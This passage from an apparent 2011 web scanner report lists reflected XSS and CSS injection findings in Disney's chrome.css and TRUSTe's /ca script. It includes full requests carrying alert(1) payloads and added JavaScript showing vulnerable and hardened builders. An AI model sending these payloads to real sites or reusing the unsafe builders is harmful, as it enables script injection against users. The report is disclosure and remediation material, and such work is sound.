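// attribute context first and the JavaScript string context second.
function buildUsersyncSafe(callback, userId) {
  let url;
  try { url = new URL(callback); } catch (e) { throw new Error('callback is not a valid URL'); }
  if (!['http:', 'https:'].includes(url.protocol)) throw new Error('bad scheme');
  if (!ALLOWED_CALLBACK_HOSTS.has(url.hostname)) throw new Error('host not allowed');
  if (!/^\d+$/.test(String(userId))) throw new Error('userId must be numeric');
  url.searchParams.set('admeld_adprovider_id', '193');
  url.searchParams.set('external_user_id', String(userId));
  url.searchParams.set('expiration', '0');
  const markup = '<img src="' + encodeHtmlAttr(url.href) + '" width="0" height="0"/>';
  return 'document.write(' + jsStringLiteral(markup) + ');';
}

// Payload and user id exactly as they appear in the 5.10 request.
const PAYLOAD = "http://tag.admeld.com/matchc41fd'-alert(1)-'405c5446774";
const USER_ID = '3420415245200633085';

// Line 5.10's response body, reproduced by the unsafe builder.
const REPORTED_BODY = "document.write('<img src=\"http://tag.admeld.com/matchc41fd'-alert(1)-'405c5446774?admeld_adprovider_id=193&external_user_id=3420415245200633085&expiration=0\" width=\"0\" height=\"0\"/>');";
```

The same jsStringLiteral routine closes the 5.11 case: JSON.stringify chooses double quotes and escapes any embedded quote or backslash, so neither ' nor " supplied in a parameter name can end the rm_url literal. The encoding order matters because the value is an HTML attribute inside a JavaScript string: HTML-encode first, then JavaScript-encode. Reversed, the JavaScript parser restores the raw quote before the HTML parser ever sees the attribute.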

5.12. http://ahome.disney.go.com/globalelements/chrome.css [styleBackground parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleBackground request parameter is copied unmodified into a CSS colour value in the response (the rule #gde_chromeContents {...background-color:#null...}). The payload e07d2<script>alert(1)</script>792a5655ec9 was submitted in the styleBackground parameter and echoed without any encoding or validation. Note that the literal string null sent by the including page is written the same way, so no check is applied to legitimate values either.

This proof-of-concept shows that arbitrary text can be injected into the stylesheet. The response is served with Content-Type: text/css, so when it is loaded through a link element or @import the injected script tag does not execute; script execution would require a browser to render this response as an HTML document, for example through content sniffing on direct navigation. Treat it as an unvalidated CSS injection with a browser-dependent path to script execution rather than as a confirmed HTML-context XSS.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null&styleBackground=nulle07d2<script>alert(1)</script>792a5655ec9&styleHover=null&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:34:31 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:34:31 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB17
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=D952C2DC-3CBA-42CB-9B90-CD1DC6A6C29F; path=/; expires=Mon, 16-May-2031 01:34:31 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:34:31 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7340
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
de_chromeContainer th { text-align: left; }#gde_chromeContainer {font-size:11px;width:100%;background:none;position:relative;z-index:100000000;}#gde_chromeContents {margin:0 auto;background-color:#nulle07d2<script>alert(1)</script>792a5655ec9;width:996px;height:48px;}#gde_chromeButtons {margin-top:0;float:left;width:634px;}.gde_chromeExploreButtons {border-bottom:solid 1px #acacac;width:100%;}.gde_chromePlayButtons {height:23px;width:100%;
...[SNIP]...

5.13. http://ahome.disney.go.com/globalelements/chrome.css [styleHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleHover request parameter is copied unmodified into a CSS colour value (a.gde_homeLink:hover{background-color:#null...}) in a response served as text/css. The payload caeb3<script>alert(1)</script>2a777733971 was submitted in the styleHover parameter and echoed without encoding.

This proof-of-concept shows that arbitrary text can be injected into the stylesheet. Loaded as a stylesheet, the injected script tag does not execute; script execution depends on a browser rendering the text/css response as HTML, so this is an unvalidated CSS injection with a browser-dependent path to XSS.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null&styleBackground=null&styleHover=nullcaeb3<script>alert(1)</script>2a777733971&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:35:28 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:35:28 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=3FD48562-E5BB-4B43-B1D0-D2B8211B97E1; path=/; expires=Mon, 16-May-2031 01:35:28 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:35:28 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7496
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
:left;background-image:url('http://a.dolimg.com/en-US/dcom/media/chrome/sprites/chromeSprites.png');background-repeat:no-repeat;background-position:32px 6px;}a.gde_homeLink:hover{background-color:#nullcaeb3<script>alert(1)</script>2a777733971;}#gde_chromeSearch{margin: 16px 1px 0 0;padding:0 0 0 4px;float:right;border:none;width:150px;height:18px;line-height:18px;background-color:#FFFFFF;text-align:left;font-weight:bold;font-size:12px;}.gd
...[SNIP]...

5.14. http://ahome.disney.go.com/globalelements/chrome.css [styleMiddleLine parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleMiddleLine request parameter is copied unmodified into a CSS border declaration (.gde_chromeExploreButtons {border-bottom:solid 1px #null...}) in a response served as text/css. The payload f3fbf<script>alert(1)</script>79b4d1ad707 was submitted in the styleMiddleLine parameter and echoed without encoding.

This proof-of-concept shows that arbitrary text can be injected into the stylesheet. Loaded as a stylesheet, the injected script tag does not execute; script execution depends on a browser rendering the text/css response as HTML, so this is an unvalidated CSS injection with a browser-dependent path to XSS.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null&styleBackground=null&styleHover=null&styleMiddleLine=nullf3fbf<script>alert(1)</script>79b4d1ad707&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:36:19 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:36:19 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB14
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=FA3E265E-A72E-45E9-B6EC-E7801FA9AEF1; path=/; expires=Mon, 16-May-2031 01:36:19 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:36:19 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7340
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
0;}#gde_chromeContents {margin:0 auto;background-color:#868686;width:996px;height:48px;}#gde_chromeButtons {margin-top:0;float:left;width:634px;}.gde_chromeExploreButtons {border-bottom:solid 1px #nullf3fbf<script>alert(1)</script>79b4d1ad707;width:100%;}.gde_chromePlayButtons {height:23px;width:100%;}.gde_chromeButtonTD{width:400px;}.gde_chromeButtonContents a {outline: none;white-space: nowrap;cursor:hand;text-align:center;}.gde_homeLink
...[SNIP]...

5.15. http://ahome.disney.go.com/globalelements/chrome.css [styleSelected parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleSelected request parameter is copied unmodified into a CSS colour value (a.gde_chromeExploreButtonSelected{...background-color:#null...}) in a response served as text/css. The payload 624d5<script>alert(1)</script>d2c80c7c004 was submitted in the styleSelected parameter and echoed without encoding.

This proof-of-concept shows that arbitrary text can be injected into the stylesheet. Loaded as a stylesheet, the injected script tag does not execute; script execution depends on a browser rendering the text/css response as HTML, so this is an unvalidated CSS injection with a browser-dependent path to XSS.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null&styleBackground=null&styleHover=null&styleMiddleLine=null&styleSelected=null624d5<script>alert(1)</script>d2c80c7c004 HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:37:06 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:37:06 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=B07D636C-D39C-4932-8172-E85B90321B74; path=/; expires=Mon, 16-May-2031 01:37:06 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:37:06 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7379
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
t:bold;}a.gde_chromeExploreButtonSelected, a.gde_chromeExploreButtonSelected:link, a.gde_chromeExploreButtonSelected:visited{width:100%;line-height:23px;height:24px;display:block;background-color:#null624d5<script>alert(1)</script>d2c80c7c004;color:#ffffff;text-decoration:none;font-size:11px;font-weight:bold;}a.gde_chromeExploreButton:hover{background-color:#acacac;color:#ffffff;}a.gde_chromeExploreButtonSelected:hover{background-color:#ac
...[SNIP]...

5.16. http://ahome.disney.go.com/globalelements/chrome.css [styleText parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleText request parameter is copied unmodified into a CSS colour value (a.gde_chromeExploreButton{...color:#null...}) in a response served as text/css. The payload 22159<script>alert(1)</script>8b3f9e779e5 was submitted in the styleText parameter and echoed without encoding.

This proof-of-concept shows that arbitrary text can be injected into the stylesheet. Loaded as a stylesheet, the injected script tag does not execute; script execution depends on a browser rendering the text/css response as HTML, so this is an unvalidated CSS injection with a browser-dependent path to XSS.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null22159<script>alert(1)</script>8b3f9e779e5&styleTextHover=null&styleTextSelected=null&styleBackground=null&styleHover=null&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:31:47 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:31:47 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=1DD3D030-C717-4860-AEFF-7A704C947B05; path=/; expires=Mon, 16-May-2031 01:31:47 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:31:47 GMT
X-UA-COMPATIBLE: IE=EmulateIE7
Content-Length: 7379
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
rrowButton:hover{background-color:#acacac;}a.gde_chromeExploreButton, a.gde_chromeExploreButton:link, a.gde_chromeExploreButton:visited{width:100%;line-height:23px;height:24px;display:block;color:#null22159<script>alert(1)</script>8b3f9e779e5;text-decoration:none;font-size:11px;font-weight:bold;}a.gde_chromeExploreButtonSelected, a.gde_chromeExploreButtonSelected:link, a.gde_chromeExploreButtonSelected:visited{width:100%;line-height:23px;h
...[SNIP]...

5.17. http://ahome.disney.go.com/globalelements/chrome.css [styleTextHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleTextHover request parameter is copied unmodified into a CSS colour value, and more than once (a.gde_chromeExploreButton:hover{...color:#null...} and again in the :hover rule of the selected button), in a response served as text/css. The payload 77a2d<script>alert(1)</script>f064bac5f03 was submitted in the styleTextHover parameter and echoed without encoding.

This proof-of-concept shows that arbitrary text can be injected into the stylesheet. Loaded as a stylesheet, the injected script tag does not execute; script execution depends on a browser rendering the text/css response as HTML, so this is an unvalidated CSS injection with a browser-dependent path to XSS.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null77a2d<script>alert(1)</script>f064bac5f03&styleTextSelected=null&styleBackground=null&styleHover=null&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:32:45 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:32:45 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=2FC77E24-DC4C-42B8-B47C-38DEC7DE0BDE; path=/; expires=Mon, 16-May-2031 01:32:45 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:32:45 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7418
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
e-height:23px;height:24px;display:block;background-color:#acacac;color:#ffffff;text-decoration:none;font-size:11px;font-weight:bold;}a.gde_chromeExploreButton:hover{background-color:#acacac;color:#null77a2d<script>alert(1)</script>f064bac5f03;}a.gde_chromeExploreButtonSelected:hover{background-color:#acacac;color:#null77a2d<script>
...[SNIP]...

5.18. http://ahome.disney.go.com/globalelements/chrome.css [styleTextSelected parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ahome.disney.go.com
Path:   /globalelements/chrome.css

Issue detail

The value of the styleTextSelected request parameter is copied unmodified into a CSS colour value (a.gde_chromeExploreButtonSelected{...color:#null...}) in a response served as text/css. The payload 6f590<script>alert(1)</script>b6bc8f7735 was submitted in the styleTextSelected parameter and echoed without encoding.

This proof-of-concept shows that arbitrary text can be injected into the stylesheet. Loaded as a stylesheet, the injected script tag does not execute; script execution depends on a browser rendering the text/css response as HTML, so this is an unvalidated CSS injection with a browser-dependent path to XSS.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null6f590<script>alert(1)</script>b6bc8f7735&styleBackground=null&styleHover=null&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:33:42 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:33:42 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB17
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=6F96A674-2F26-47A6-A25C-B1C1B941123A; path=/; expires=Mon, 16-May-2031 01:33:42 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:33:42 GMT
Content-Length: 7415
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
chromeExploreButtonSelected, a.gde_chromeExploreButtonSelected:link, a.gde_chromeExploreButtonSelected:visited{width:100%;line-height:23px;height:24px;display:block;background-color:#acacac;color:#null6f590<script>alert(1)</script>b6bc8f7735;text-decoration:none;font-size:11px;font-weight:bold;}a.gde_chromeExploreButton:hover{background-color:#acacac;color:#ffffff;}a.gde_chromeExploreButtonSelected:hover{background-color:#acacac;color:#ff
...[SNIP]...
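Added example, not Disney's chrome.css code: findings 5.12 through 5.18 share one defect, a query parameter written straight after a '#' in a colour declaration. The block below reproduces that pattern for the seven parameters and a hardened version that accepts only 3- or 6-digit hex colours and otherwise falls back to a default, which also removes the #null values the stylesheet currently emits for the including page's own requests. Selector and property names are taken from the response fragments in the report; the default colours and the handler shape are assumptions.

```javascript
// Added example (not the ahome.disney.go.com code). Reproduces the unvalidated
// colour reflection from findings 5.12-5.18 and shows a strict replacement.

// Parameter -> the rule it feeds. Selectors/properties as seen in the report;
// fallback colours are assumed defaults, not values known from the site.
const COLOR_RULES = {
  styleBackground:   { selector: '#gde_chromeContents',               property: 'background-color', prefix: '',           fallback: '868686' },
  styleHover:        { selector: 'a.gde_homeLink:hover',              property: 'background-color', prefix: '',           fallback: 'acacac' },
  styleMiddleLine:   { selector: '.gde_chromeExploreButtons',         property: 'border-bottom',    prefix: 'solid 1px ', fallback: 'acacac' },
  styleText:         { selector: 'a.gde_chromeExploreButton',         property: 'color',            prefix: '',           fallback: 'ffffff' },
  styleTextHover:    { selector: 'a.gde_chromeExploreButton:hover',   property: 'color',            prefix: '',           fallback: 'ffffff' },
  styleSelected:     { selector: 'a.gde_chromeExploreButtonSelected', property: 'background-color', prefix: '',           fallback: 'acacac' },
  styleTextSelected: { selector: 'a.gde_chromeExploreButtonSelected', property: 'color',            prefix: '',           fallback: 'ffffff' },
};

// Vulnerable pattern (what the responses above show): the raw parameter is
// written after '#', so both 'null' and '<script>...' land in the stylesheet.
function renderChromeCssUnsafe(query) {
  return Object.entries(COLOR_RULES).map(([name, r]) =>
    r.selector + '{' + r.property + ':' + r.prefix + '#' + query[name] + ';}').join('');
}

// Strict allow-list: a colour is exactly 3 or 6 hex digits. Anything else,
// including a missing value or the literal string 'null', uses the fallback.
const HEX_COLOR = /^(?:[0-9a-f]{3}|[0-9a-f]{6})$/i;
function hexColor(value, fallback) {
  const v = String(value == null ? '' : value).trim();
  return '#' + (HEX_COLOR.test(v) ? v.toLowerCase() : fallback);
}

// Hardened renderer: same rules, every colour passed through hexColor().
function renderChromeCssSafe(query) {
  return Object.entries(COLOR_RULES).map(([name, r]) =>
    r.selector + '{' + r.property + ':' + r.prefix + hexColor(query[name], r.fallback) + ';}').join('');
}

// Query parameters exactly as the 5.12 request sent them.
const REPORT_QUERY = {
  styleText: 'null', styleTextHover: 'null', styleTextSelected: 'null',
  styleBackground: 'nulle07d2<script>alert(1)</script>792a5655ec9',
  styleHover: 'null', styleMiddleLine: 'null', styleSelected: 'null',
};
```

Validating against the grammar of the value (a hex colour) is the right fix here rather than HTML-encoding: CSS has no entity syntax, and encoding would still let arbitrary CSS through. Serving the stylesheet with X-Content-Type-Options: nosniff is the belt-and-braces control for the content-sniffing path noted in the findings.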

5.19. http://choices.truste.com/ca [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied without encoding into the JavaScript response (served as text/javascript) in more than one position: as part of a variable name (the fragment ..._ib = '... in the response) and inside single-quoted string literals such as the div id. The payload d79df<script>alert(1)</script>bd6ec20411 was submitted in the c parameter and echoed unmodified. Note that the request also carries an earlier payload in the same parameter (att01cont1f4061<script>alert(1)</script>d96264b56bd), so the response reflects both.

Because the parameter reaches executable code rather than an HTML document, the injected script tag is not itself what would run; the finding is that unvalidated input is placed directly into JavaScript source, where it is free to alter the script. The response is text/javascript, so a browser that navigates to this URL displays it as text; the exposure is on pages that load this script with an attacker-influenced c value.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bdd79df<script>alert(1)</script>bd6ec20411&w=300&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:19:00 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4991

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</script>d96264b56bdd79df<script>alert(1)</script>bd6ec20411_ib = '<div id="te-clr1-att01cont1f4061<script>
...[SNIP]...

5.20. http://choices.truste.com/ca [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the h request parameter is copied without encoding into a JavaScript object literal in the response (served as text/javascript), in an unquoted position that is expected to hold a number ('height':250f8c30<script>...). The payload f8c30<script>alert(1)</script>184723fc829 was submitted in the h parameter and echoed unmodified, which breaks the syntax of the script.

The script tag is not meaningful in this context; what the reflection shows is that any JavaScript expression supplied in h becomes part of the executed script, since there is neither a numeric check nor any quoting around the value. Exploitation requires the parameter to be attacker-influenced in the script URL of a page that includes it; direct navigation to a text/javascript response only displays it as text.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=300&h=250f8c30<script>alert(1)</script>184723fc829&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
